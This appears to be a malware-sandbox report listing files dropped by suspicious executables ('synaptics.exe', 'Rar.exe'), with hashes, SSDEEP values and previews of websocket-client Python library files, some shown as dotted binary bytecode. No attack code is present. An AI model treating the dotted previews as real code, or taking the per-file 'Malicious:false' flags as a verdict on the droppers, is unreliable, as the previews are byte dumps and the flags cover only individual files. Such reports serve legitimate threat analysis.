                                                                                                                                                                                      Preview:o.........f.2.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.Z.W.n.......d.Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"G.d.d...d.e ..Z#Y.G.d.d...d...Z$d.e%d.e&f.d.d...Z'd.e%f.d.d...Z(d.e)d.e*d.e&f.d d!..Z+d"d#..Z,d$e.j.d%e-f.d&d'..Z.d$e.j.d(e-f.d)d*..Z/d$e.j.d.e)d.e.j.f.d+d,..Z0d$e.j.d.e&f.d-d...Z1d.S.)/a_...._http.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specifi
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2429
                                                                                                                                                                                      Entropy (8bit):4.742769130722236
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:93spkf0YgURvDMDzDf+h3X0V3fFxksmtOX5uPJPZXrnquoGgBED:92i0Yg803W3X0VvqtOX5uPJBloGgB4
                                                                                                                                                                                      MD5:01AEED6E6CD548FF5EAE4AD7071933FD
                                                                                                                                                                                      SHA1:67D7D3C0A7C92E39F9402EE2936A9E7C3A8C3F3B
                                                                                                                                                                                      SHA-256:C615AB11870F9324CD37D33BD1F4D08D673C835FD5AC844861D2FE2937D6AA3F
                                                                                                                                                                                      SHA-512:AD32701A38C6FDCD1880C695B68D9278B4A0CE565A695D00FD371ECDCCC956A5DC8517BF6163C59237D1BDB58F3101F3B6BCA01D4BAF04E73C5C5B260D0EDD66
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f.........................@...s&...d.d.l.Z...e...d...Z.z.d.d.l.m.Z...W.n...e.y$......G.d.d...d.e.j...Z.Y.n.w.e...e.......d.a.g.d...Z.e.....d.f.d.e.d.e.j.d.e.d.d.f.d.d...Z.d.e.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d d!..Z.d.e.f.d"d#..Z.d.S.)$.....N..websocket)...NullHandlerc....................@...s....e.Z.d.Z.d.d.d...Z.d.S.).r......returnNc....................C...s....d.S...N..)...self..recordr....r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\_logging.py..emit...........z.NullHandler.emit).r....N)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....F)...enableTrace..dump..error..warning..debug..trace..isEnabledForError..isEnabledForDebug..isEnabledForTrace..DEBUG..traceable..handler..levelr....c....................C...s*...|.a.|.r.t...|.....t...t.t.|.......d.S.d.S.).z.. Turn on/off the traceability... Parameters. ----------.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4051
                                                                                                                                                                                      Entropy (8bit):5.416582834388625
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:JJkFTFnpUXHQ9VTyHLDPEoFgTHX+S6VAqcm1MlMfs:JyhnmXoTUsoUuSE11IMfs
                                                                                                                                                                                      MD5:0F40BBC4ABF7B82C0F89D9BEC7C67E98
                                                                                                                                                                                      SHA1:FDE5942299FF94C32F4FCB18B000578374553C26
                                                                                                                                                                                      SHA-256:86CC577D5193C131FD5C8555DE8D8FC0330FC02CE198D24FFAFEFA839FBA70E5
                                                                                                                                                                                      SHA-512:08220A36FE987ED0C94F1C5AA6142DF02DB49C25073952931D771E332DA14787CF397F8FB741F02EA5AE809CA8C1784D5C53F88D56B48B7DA642CDDEAD65B276
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........fN........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j.e.j.d.f.g.Z.e.e.d...rDe...e.j.e.j.d.f.....e.e.d...rSe...e.j.e.j.d.f.....e.e.d...rbe...e.j.e.j.d.f.....e.e.d...rqe...e.j.e.j.d.f.....d.a.g.d...Z.G.d.d...d...Z.d.e.e.e.d.f...d.d.f.d.d...Z.d.e.e.e.d.f...f.d.d...Z.d.e.j.d.e.d.e f.d.d...Z!d.e.j.d.e f.d.d...Z"d.e.j.d.e.e e#f...d.e.f.d.d...Z$d.S.) .....N)...Union.....).."WebSocketConnectionClosedException..WebSocketTimeoutException)...SSLError..SSLWantReadError..SSLWantWriteError)...extract_error_code..extract_err_message..SO_KEEPALIVE..TCP_KEEPIDLE.......TCP_KEEPINTVL.......TCP_KEEPCNT.....)...DEFAULT_SOCKET_OPTION..sock_opt..setdefaulttimeout..getdefaulttimeout..recv..recv_line..sendc....................@...s"...e.Z.d.Z.d.e.d.e.d.d.f.d.d...Z.d.S.).r......sockopt..sslopt..returnNc....................C...s....|.d.u.r.g.}.|.d.u.r.i.}.|.|._.|.|._.d.|._.d.S...N).r....r......timeout)...selfr....r......r.....C
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1504
                                                                                                                                                                                      Entropy (8bit):5.231969165830796
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:YiToV7RkwGW7mTzhZl4IpheU0E+4HQk1Gps2B5OBD8TONq5HJu2OeuxHb:D07aLUI4+h0CH31KN0BQTvVfyb
                                                                                                                                                                                      MD5:CB57598270B045478A23D723F0C08925
                                                                                                                                                                                      SHA1:835D0F20FF959D957B2D894B963C3B5674628D3F
                                                                                                                                                                                      SHA-256:80E5909A29883D437F293845472EFAA9D489900C12CABDA0BC3E073F325DC8E0
                                                                                                                                                                                      SHA-512:893CF1E7594C64BAF838EA0285D6D215A1BD197E3E6006AD4BC1C9A2F390D3CAB9CB591FA3E4088F155FD7D5C9C0205DFA3938EBBD9323812EF8EB10AF338D50
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f.........................@...s....d.Z.g.d...Z.z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.Z.W.d.S...e.yI......G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.Y.d.S.w.).ae...._ssl_compat.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..)...HAVE_SSL..ssl..SSLError..SSLEOFError..SSLWantReadError..SSLWantWriteError.....N).r....r....r....r....Tc....................@........e.Z.d.Z.d.S.).r....N....__name__..__module__..__qu
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4367
                                                                                                                                                                                      Entropy (8bit):5.500850419682739
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:klQBQRosjToIzsNAuT/ceAxr6UYtSwGJBBK9WFSuGZDgQ:TBQRRXBIkB2UYPQkqGZ
                                                                                                                                                                                      MD5:7005371AE2BB78841891EF92AB5E5752
                                                                                                                                                                                      SHA1:167AAE6084F3987B8169FC29ECDF68F1F837A210
                                                                                                                                                                                      SHA-256:A9EA089C77E4596310E77FA9E4B403D0FAEACFDD92DEF0E551506336C7755243
                                                                                                                                                                                      SHA-512:7D1ADF82D23A96AF34FCCF47D1CA9A64A0BEDA9CB2DA947EBC5A67D8AD5AD2F06FE38C5A2EA510FD43822815543A9672C836820563C9869D40F9E410883DA2B2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....d.d.g.Z.d.e.d.e.f.d.d...Z.d.d.g.Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e...d.e.f.d.d...Z...........d!d.e.d.e.d.e.e...d.e.d.e.e...d.e.e...d.e.d.e.f.d d...Z.d.S.)".....N)...Optional)...unquote..urlparse.....)...WebSocketProxyException..parse_url..get_proxy_info..url..returnc....................C...s....d.|.v.r.t.d.....|...d.d...\.}.}.t.|.d.d...}.|.j.r.|.j.}.n.t.d.....d.}.|.j.r)|.j.}.d.}.|.d.k.r4|.s3d.}.n.|.d.k.r?d.}.|.s>d.}.n.t.d.|.......|.j.rL|.j.}.n.d.}.|.j.rY|.d.|.j.....7.}.|.|.|.|.f.S.).z.. parse url and the result is tuple of. (hostname, port, resource path and the flag of secure mode).. Parameters. ----------. url: str. url string.. ..:z.url is invalidr......http)...schemez.hostname is invalidr....F..ws.P.....wssTi....z.scheme %s is invalid../..?)...ValueError..splitr......hostname..port..path..query).r....r......parse
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4085
                                                                                                                                                                                      Entropy (8bit):4.077867033704649
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:3xFBpqD0ey3vxQkJxriXOTwJSPe1IHcO6GA9PYR:3xFBpo0ey+k/rUOTOSP+IP6GnR
                                                                                                                                                                                      MD5:F426432B1343D6B49993DEC627231894
                                                                                                                                                                                      SHA1:3E521B29DB1328679565367C13D0F0A7D9A332AF
                                                                                                                                                                                      SHA-256:F37DFD47C5A47A2F78D65513DCF21F921D810F16B626FFA6D538551832D95E11
                                                                                                                                                                                      SHA-512:A14DC0A8EFFA77DDCDFCD22A01404353369156E126397077E1AF1B031807EEA92642CB5D0232C023C07987044F755A03A7FF33D2068B9E2386FC046AAD489435
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f1........................@...s....d.d.l.m.Z.....g.d...Z.G.d.d...d...Z.z.d.d.l.m.Z...d.e.e.e.f...d.e.f.d.d...Z.W.n+..e.yR......d.Z.d.Z.g.d...Z.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d...Z.Y.n.w.d.e.e.e.f...d.e.f.d.d...Z.d.e.d.e.e.d.f...f.d.d...Z.d.e.d.e.e.d.f...f.d.d...Z.d.S.)......)...Union)...NoLock..validate_utf8..extract_err_message..extract_error_codec....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.).r......returnNc....................C........d.S...N..)...selfr....r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\_utils.py..__enter__...........z.NoLock.__enter__c....................C...r....r....r....).r......exc_type..exc_value..tracebackr....r....r......__exit__....r....z.NoLock.__exit__).r....N)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....)...Utf8Validator..utfbytesr....c....................C...s....t.....|...d...}.|.S...Nr....).r......validate).r......resultr....r....r......_validate_u
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14385
                                                                                                                                                                                      Entropy (8bit):4.848807375084742
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:pz3s/K8Qo2YlU99tCkBizTFEeoS+wWg9tCt:pzcS8RYg9tS
                                                                                                                                                                                      MD5:8ADD410E88A5612988C997819E4655AA
                                                                                                                                                                                      SHA1:554BDA7F3021E07FE1D4E24AA7E00EB43E5A66CB
                                                                                                                                                                                      SHA-256:59EB14252486491A73B93A7455E2B5D8EE1261854C37A0B237A6EA5D2E25936C
                                                                                                                                                                                      SHA-512:7642448A35DFD7623F355DF22D1FAA3B70A6B5FC17B1AF06F445154DDEDA3139DE02FB80AF24D09CEC0B109BA5687C5BDC320AD3E1E1500B0C9A567DFFBF953D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import array.import os.import struct.import sys.from threading import Lock.from typing import Callable, Optional, Union..from ._exceptions import WebSocketPayloadException, WebSocketProtocolException.from ._utils import validate_utf8.."""._abnf.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.."""..try:. # If wsaccel is available, use compiled routines to mask data.. # wsaccel only provides around a 10% speed boost compared. # to the web
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24176
                                                                                                                                                                                      Entropy (8bit):4.286112006590021
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:RY33H5ut9dsRexb5nbREZv53vmk5d5z5RMyRM6syfl9757OdbZARyCfk3LTvjn2N:a329zbkLjlq/CdTGr5t83qZRfWboU
                                                                                                                                                                                      MD5:969ACCA2E09B43CFCD8BD9AB6F4436D3
                                                                                                                                                                                      SHA1:87FE009278EFA0E6F03CE7AC254C8297D1698AA0
                                                                                                                                                                                      SHA-256:C4202568CD857EC3CBB1A12C0465E1760E289470C413389FEA595259E7C7726F
                                                                                                                                                                                      SHA-512:3D74257EC9DD09F24FED72DA4F9F857B6E91D35641164D5B98700CD2B212A082D439F8F841A4D6C37D28665DAD459305534572DCA127F02FD9555A7E05BD6E0C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import inspect.import selectors.import socket.import threading.import time.from typing import Any, Callable, Optional, Union..from . import _logging.from ._abnf import ABNF.from ._core import WebSocket, getdefaulttimeout.from ._exceptions import (. WebSocketConnectionClosedException,. WebSocketException,. WebSocketTimeoutException,.).from ._ssl_compat import SSLEOFError.from ._url import parse_url.."""._app.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2399
                                                                                                                                                                                      Entropy (8bit):4.233025812751045
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:s4+h0CH31KZNoP0plP7SgYnrXc0plP7xNf9YSkPEM59KERxcv:s4s3HFKZNoP0pjYQ0p5ET53zcv
                                                                                                                                                                                      MD5:ADF0E1D2B7019795A0A0097E95A88EA1
                                                                                                                                                                                      SHA1:90D7BA8C28A84D5458415F0992FFBE100A524952
                                                                                                                                                                                      SHA-256:F3DDD25A81E693F272B225E3F259322F2F79728E73BEE0BAD9718CAEF9A023B1
                                                                                                                                                                                      SHA-512:B484D26A9E80248E7FE6799C8EF2D22042FA5E03263D4576372A9FF151FCCBF787B9E1F7CDFDCD17E3F518093EF6A17C4282DDFBC63FDC7D501604D59BC4E121
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import http.cookies.from typing import Optional.."""._cookiejar.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.."""...class SimpleCookieJar:. def __init__(self) -> None:. self.jar: dict = {}.. def add(self, set_cookie: Optional[str]) -> None:. if set_cookie:. simple_cookie = http.cookies.SimpleCookie(set_cookie).. for v in simple_cookie.values():. if domain := v.get("domain"):.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21080
                                                                                                                                                                                      Entropy (8bit):4.424175697192212
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:ep3q/9NgJ78wiWKWz2hX1RU6+Dv0qeVdTu:Gm9N2rT2x50vUnTu
                                                                                                                                                                                      MD5:DBF9560EAB036E84ED3D64748AAD031A
                                                                                                                                                                                      SHA1:64D0E416525D14BC6DA74785123344DBDCE6FC65
                                                                                                                                                                                      SHA-256:3FE95873093E2CA254283A8195E26C9914882635F6BFFA381689E074961B867F
                                                                                                                                                                                      SHA-512:EF5E60E7742778309BBD7A368451FC3C089D6F24EB819C61D9D784540A664D25D389EA837C832B549A9403D79166694557B445CF1EC75FA93E8016B1FB878952
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import socket.import struct.import threading.import time.from typing import Optional, Union..# websocket modules.from ._abnf import ABNF, STATUS_NORMAL, continuous_frame, frame_buffer.from ._exceptions import WebSocketProtocolException, WebSocketConnectionClosedException.from ._handshake import SUPPORTED_REDIRECT_STATUSES, handshake.from ._http import connect, proxy_info.from ._logging import debug, error, trace, isEnabledForError, isEnabledForTrace.from ._socket import getdefaulttimeout, recv, send, sock_opt.from ._ssl_compat import ssl.from ._utils import NoLock.."""._core.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS I
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2178
                                                                                                                                                                                      Entropy (8bit):4.694646566674817
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:lZl4IpheU0E+4HQk1Gps2+KJHRXHNJu8u8jZAG90ocFYmBklxakJvf:94+h0CH31KaKJFC8uY90ocFNYk6X
                                                                                                                                                                                      MD5:68CB66FEF8444FC72E4E3B11426A8E9A
                                                                                                                                                                                      SHA1:545638D7B8823EE10376105E7A6E2A83E0FA81CE
                                                                                                                                                                                      SHA-256:AFB946682F18D9BAC19DA2BF6092510DD618E940865B1397A10B0C720145789E
                                                                                                                                                                                      SHA-512:05CC7BC26B54393EBCEA9BC29AAA2649FC04838D8E6E002997FEFAF24B035081ACFE98FCE6554477A42A0FDD2D6262BBFD1C63E402AC2ACFB018FB12F3359DB4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""._exceptions.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.."""...class WebSocketException(Exception):. """. WebSocket exception class.. """.. pass...class WebSocketProtocolException(WebSocketException):. """. If the WebSocket protocol is invalid, this exception will be raised.. """.. pass...class WebSocketPayloadException(WebSocketException):. """. If the WebSocket payload is invalid, this exception will be ra
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6578
                                                                                                                                                                                      Entropy (8bit):4.899084345690126
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:k33HwDg2naLgD/U5fBdVhjy3zfXJsYnVReT62lUi:k3buGBdvsuIerR
                                                                                                                                                                                      MD5:2786D1FDEF78BDB8A61F442319FFCBF5
                                                                                                                                                                                      SHA1:00333DF00E37673764DDE0FA8BAD7B12832437D7
                                                                                                                                                                                      SHA-256:87FF3C4BABE14AD399063E7330626D20A155D5154C56E12C90BC9B8C90A76A3E
                                                                                                                                                                                      SHA-512:43C0DC848DAFF91A369481C7C47B878228C31B4CE07E998187A4808B98BEC42EED7F6DF696B6F14F335FC31417B051A0E23FF2C3997D55E3927AE2D6C2DF07BB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""._handshake.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..""".import hashlib.import hmac.import os.from base64 import encodebytes as base64encode.from http import HTTPStatus..from ._cookiejar import SimpleCookieJar.from ._exceptions import WebSocketException, WebSocketBadStatusException.from ._http import read_headers.from ._logging import dump, error.from ._socket import send..__all__ = ["handshake_response", "handshake", "SUPPORTED_REDIR
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12818
                                                                                                                                                                                      Entropy (8bit):4.632949700173338
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:r33HpgEC7EcgGT3pxjQxlJgjNqew2mmReSePExCN044oN1ZuTcHgvlX9Q6YTF1va:r3KECwAZSxlJgjNqelReSeko+M8pEch
                                                                                                                                                                                      MD5:5C262A436290AAE2EEA1BF714D12BBA7
                                                                                                                                                                                      SHA1:F1D27671EC272B944B6B801E8EEACDCC325F330D
                                                                                                                                                                                      SHA-256:DF71ACAE85A02E13AC13CA4C0B65E46BE463A273EE532A6378544004502D409A
                                                                                                                                                                                      SHA-512:1669C4C98BE2D03A23E3A4DA49C9630E721247A97CEB6CF0B37F3E3C82E79D3F1CE86B443AC0A1A87B21B34013C5D04F369D7643CAE78B1569EF8FFC16D531EA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""._http.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..""".import errno.import os.import socket.from base64 import encodebytes as base64encode..from ._exceptions import (. WebSocketAddressException,. WebSocketException,. WebSocketProxyException,.).from ._logging import debug, dump, trace.from ._socket import DEFAULT_SOCKET_OPTION, recv_line, send.from ._ssl_compat import HAVE_SSL, ssl.from ._url import get_proxy_info, parse_url..__a
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2228
                                                                                                                                                                                      Entropy (8bit):4.84593041409184
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:E4+h0CH31KBTL3QtXbY1sP7FVql0V3fgy570kSYL5d2M3KSYN2hRrXS9RrXtLRem:E4s3HFKEY1sPpVS0VvJY2hRTS9RTtLRB
                                                                                                                                                                                      MD5:F6ED1BDAAE567FE7BD69477D21D996A7
                                                                                                                                                                                      SHA1:A2C33019225AC20377D310DD7F3E801DE0205074
                                                                                                                                                                                      SHA-256:0C7454978B0469292896F328E00EAEA67ED42181749094F936500BD2F5821D12
                                                                                                                                                                                      SHA-512:0673D81875A200D77C341E943A4007E880C5F1C8FD6A0DA4CF0846CA09289A6C203D91D80A4D4BE71FF71D9392A85D025AE3A25E270C4FBC85B019464F307BB6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import logging.."""._logging.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..""".._logger = logging.getLogger("websocket").try:. from logging import NullHandler.except ImportError:.. class NullHandler(logging.Handler):. def emit(self, record) -> None:. pass..._logger.addHandler(NullHandler()).._traceEnabled = False..__all__ = [. "enableTrace",. "dump",. "error",. "warning",. "debug",. "trace",. "isEn
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5198
                                                                                                                                                                                      Entropy (8bit):4.70492713419674
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:uo7hV4s3HFK8C1nKDmM2dvx+jOVdRYBqDXunRvJ5/jh7oXu0yybT5:tV33HDtwQjYdRaRnDiN
                                                                                                                                                                                      MD5:FB0EA0876954B9C9D2E1808270024AB2
                                                                                                                                                                                      SHA1:936216178CCD21C5ED05052D56C7C1B4C7740980
                                                                                                                                                                                      SHA-256:369B1404ED628670BEC4F034536A35FA13172BC7A2A6535C53D476559BD9DEA5
                                                                                                                                                                                      SHA-512:A273AA6ABA364A244D85A3AA8D290A7A2A2A6F92AD826B70C4C6BAB7012965A9B345C3E0E7A5F9D09A5322C208E25394BF9C2BD26CC3E3D3CD02CF38EB3D8663
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import errno.import selectors.import socket.from typing import Union..from ._exceptions import (. WebSocketConnectionClosedException,. WebSocketTimeoutException,.).from ._ssl_compat import SSLError, SSLWantReadError, SSLWantWriteError.from ._utils import extract_error_code, extract_err_message.."""._socket.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License.."""..DEFAULT_SOCKET_OPTION = [(socket.SOL_TCP, socket.TCP_NODELAY, 1)].if hasattr(sock
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1188
